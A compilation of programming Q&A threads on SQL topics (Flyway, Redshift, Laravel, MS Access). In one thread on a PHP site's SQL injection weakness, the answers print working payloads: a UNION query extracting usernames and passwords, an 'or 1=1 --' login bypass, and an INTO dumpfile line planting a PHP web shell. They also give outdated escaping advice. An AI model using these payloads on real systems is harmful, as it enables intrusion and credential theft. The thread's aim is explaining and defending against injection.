Postgres/Flyway: How can I wrap long constant strings in sql file? - postgresql

I want to line wrap the SQL in my flyway migration file, the working version looks like:
comment on table account is
'Multiple users may be associated with the same account (think multiple login methods, like gmail + facebook, etc.) ';
If I use IDEA and hit enter within the string it generates this:
comment on table account is
'Multiple users may be associated with the same account (think multiple' ||
' login methods, like gmail + facebook, etc.) ';
But then running the migrate operation gives the error PSQLException: ERROR: syntax error at or near "||".
Versions: Flyway 4.2, Postgres 10

It's perfectly fine to split a string across lines in SQL (without any concatenation operator):
comment on table account is
'Multiple users may be associated with the
same account (think multiple login methods,
like gmail + facebook, etc.)';

Alternative answer for wrapping the source code only, rather than the contents of the string :
comment on table account is
'Multiple users may be associated with the same account (think multiple'
' login methods, like gmail + facebook, etc.)';

Related

Using Logic Apps, how can I input a formatted Table of results from an SQL Stored Procedure into SendGrid Email

Once a day, I need to run an SQL Stored Procedure, which collects a list of results. I then need to input the results, as a nice user friendly table, into an e-mail (SendGrid).
So far, I have setup all connections and got the Logic App to work but the e-mail it generates displays the results like this:
{"Table1":[{"CaseID":"1000001","DateOfUdate":"2020-06-09T11:34:57.483"},{"CaseID":"1000002","DateOfUdate":"2020-06-09T11:34:57.483"},{"CaseID":"1000003","DateOfUdate":"2020-06-09T11:34:57.483"},{"CaseID":"1000004","DateOfUdate":"2020-06-09T11:34:57.483"}]}
How can I get this to be displayed as a proper table?
Case ID DateofUpdate
1000001 2020-06-09T11:34:57.483
1000002 2020-06-09T11:34:57.483
1000003 2020-06-09T11:34:57.483
1000004 2020-06-09T11:34:57.483
Below are images of my Logic App - please let me know if I need to provide more information.
For this requirement, please refer to the steps I provided below:
1. I initialize a variable named "resultSetVar" and store the json data same to yours', use this variable to simulate your "ResultSets" data.
2. Then use "Parse JSON" action to parse the json data.
3. After that, use "Create HTML table" action to create the html with the json array "Table1" from the "Parse JSON" action.
4. At last, put the "Output" from "Create HTML table" action into the "Email body" box.
5. Running the logic app, I received the email shown as below
Hope it helps~

Redshift - Filter multiple Not in condition

I am trying to build a query that filters out any email that has gmail or yahoo in the name. I tried the below:
select email from users where email not like ('#gmail.com','#yahoo.com')
I get an error
ERROR - operator does not exist: character varying
I am using Redshift DB. Thanks..
where email not like '%#gmail.com'
and email not like '%#yahoo.com'
there is no combination of a list with like, it works only for exact matches (in), and don't forget the wildcard (%)
if the list is larger there is another solution with a given answer (can look it up here if so)

Laravel 5.1 Reset Password Function; user's email is in a different table

I have a question regarding Laravel's Reset Password function. I have thoroughly searched for a possible solution and could not find one. Moreover, I tried to scrutinize the code and manually implement it, but failed miserably because of the nesting. (I'm new to Laravel).
According to Laravel's documentation, the user's email must be in the table user in order to work and the error code confirms it.
*Column not found: 1054 Unknown column 'email' in 'where clause' (SQL: select * from user where email = usermail#provider.com limit 1*
However, we do have the scenario that an user might have multiple email addresses, hence stored in a different table called user_email.
Does anybody have experience with this scenario and could take the time to enlighten me on this?
You have two Options:
Write your own password recovery system.
Let the user choose a primary e-mail and make a column on the users table which represents the primary e-mail adresse.

Website security, sql injection and file permissions

I am building a very small website (with PHP) and I have 2 big issues
The first one is about my search form
I have build a really simple search form in order to retrieve my content, then I used an online security tool and show me that my search form was vulnerable to SQLi
I had no idea abut that so I started testing some attacks I found on some sites
As far as now only 'OR 'x'='x worked (it returns the entire content of my website, is this bad? How can an attacker hurt me?
The second issue is about my photos, I am using a folder called mywebsite.com/uploads/ to access my photos
Although /upload is protected the subfolders uploads/temp and uploads/thumbs are visible through the browser
May this be hurtful too?
Any advice?
SQL injection is really bad but i like it :)
there is many types of sql injection like
remote sql injecton
blind sql injection
auto bypass sql injection
**Remote sql injection**
its the easy way to get data from site hacker use it like coders
see this example
mysql_query("SELECT * FROM `table_name` WHERE id=".$_GET['id']." ) ;
There is no security in my code
site.php?id=1
my query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 ) ;
if hacker he will kill your code
site.php?id=1(any thing here can make problem ex: ` ' a-z A-Z / * / " )
Because query will be like this
mysql_query("SELECT * FROM `table_name` WHERE id=1' ) ;
so single quotaion will make error in your query
and hacker can attack like this
site.php?id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users
here your query will execute like
mysql_query("SELECT * FROM `table_name` WHERE id=1 union select 0,1,concat(user_name,0x3a,password),3,4 from users) ");
and this will work :)
blind sql injection
hacker cannot work with easy way remote sql injection
because it here depend on right and false
so he will use and or
like this
and (select user_name from users) ;
if work fine the script will work good else error will happen
he can know database info like this
example admin table is admin
and (select user_name from users) ; x error
and (select user_name from admin) ; fine
auto bypass
its blicd sql injection but only true condition can access to admin
mysql_query("SELECT * FROM `users` WHERE `user_name`= ".$_POST['user']." AND `password` ='".md5($_POST['pass'])."' ");
hacker can login like this
user = anything' or 1=1 --
so your query will be like
mysql_query("SELECT * FROM `users` WHERE `user_name`= anything or 1=1 --");
anything is error user in databse
but condition or 1=1 is true
-- will ignore your password check
he can access easily
protect
addslashes _ mysql_real_escape_string _ intval ( with number only )
folder premission you can use
empty index.html , index.php ,
If you allow SQL injection, an attacker can do all sorts of bad things to your website. They can inject code to DROP DATABASE, deleting your entire database!
If you are logging into your mysql as the root user, they can potentially write to files (and create) files on your server.
The injection;
SELECT '<?php system($_GET[''cmd'']); ?>' INTO dumpfile('./command.php');
Would be a common first step to breaking into your server, allowing the attacker to execute arbitrary commands under the www-data user. From here it is trivial to recruit your server into a botnet, use it to send spam (getting you blacklisted from sending emails), or simply delete all your files just to ruin your day.
What you must do, is to sanitise all user input. So, in your search processor, you must escape any special characters from the search query before passing it onto the database, you can do this using mysql_real_escape_string();
so;
$search_query = mysql_real_escape_string($_POST['search']);
It is then safe to use $search_query in your mysql query.
SQL injections - it's bad.
someone can run any query he wants in your database, find passwords, delete your entire data etc.
you can avoid it by wrapping all user input in your queries with mysql_real_escape_string
about the directories - it really depends on the accesses you provide. if file listing is available, it doesn't really mean that someone can make changes/execute them
Ad SQL Injection:
Displaying the entire content can be a problem if you have unpublished articles or articles only available for registered users etc.
Try reading more on SQL Injections. It may be possible to execute a second query that inserts new data in your database - or worse changes data (for example passwords). There's a lot of reading material out there, a start could be: http://php.net/manual/en/security.database.sql-injection.php Sanitise all your input and remember: even if you may not find a way to do harm via a security hole it doesn't mean no one will find a way ;)
Ad the folders: you mean that any user can see the content of the folders? If so, users may see pictures they shouldn't see. If you had a good reason for protecting (no file listing?) the main directory, why not apply it to the temps/ and thumbs/ subdirectories?

Password Protect a form in MS Access 2003

I am trying to create a login for my database and I don't want to use the Microsoft way of doing so. I want to have the users login with a username and password then have that information verified in the "tblUsers" table.
UserID LoginID Level LevelID
jpurk jack23 admin 3
krimes kitty editor 2
lwalms low34 reader 1
I got as far as verifying the "UserID" and "LoginID" using dlookup
Nz(DLookup("[LoginID]", "tblUsers", "[UserID] = '" & Me.txtUserID & "'"), "")
=Me.txtPassword
The problem I have now is that I want certain items on the menu unavailable to users without the proper Level; If they are only an "editor" or a "reader", then I don't want them to have access to the "administrative" button where I have placed all admin forms.
After I use dLookup to verify the username and password, how do I now find out their "Level" and assign rights to different menu items? Thank you.
Assuming your DLookup has found an existing LoginID value, you can use another to retrieve that user's LevelID. Then enable/disable the administrative command button based on their LevelID.
I'll suggest something like this in Form Load:
Dim lngLevelID As Long
lngLevelID = DLookup("[LevelID]", "tblUsers", "[LoginID] = " & Me.txtLoginID)
Me.cmdAdmin.Enabled = (lngLevelID = 3)
Notes: That assumes you've previously loaded the user's LoginID number into a text box named txtLoginID. txtLoginID could be hidden if you don't want the users to see it. Or you can grab the LoginID value by some other method.
If you have one-to-one matches between Level and LevelID, you shouldn't need to store both values in tblUsers. You can create a UserLevels lookup table to hold both, and store just the LevelID in tblUsers as a foreign key to the appropriate row in UserLevels.
Finally, the strategy you're using can work, but the security is shaky. As "guidance" to users willing to follow the rules, it's OK. But it can be easily circumvented by even unsophisticated users. Look for a different approach if your security needs are stringent.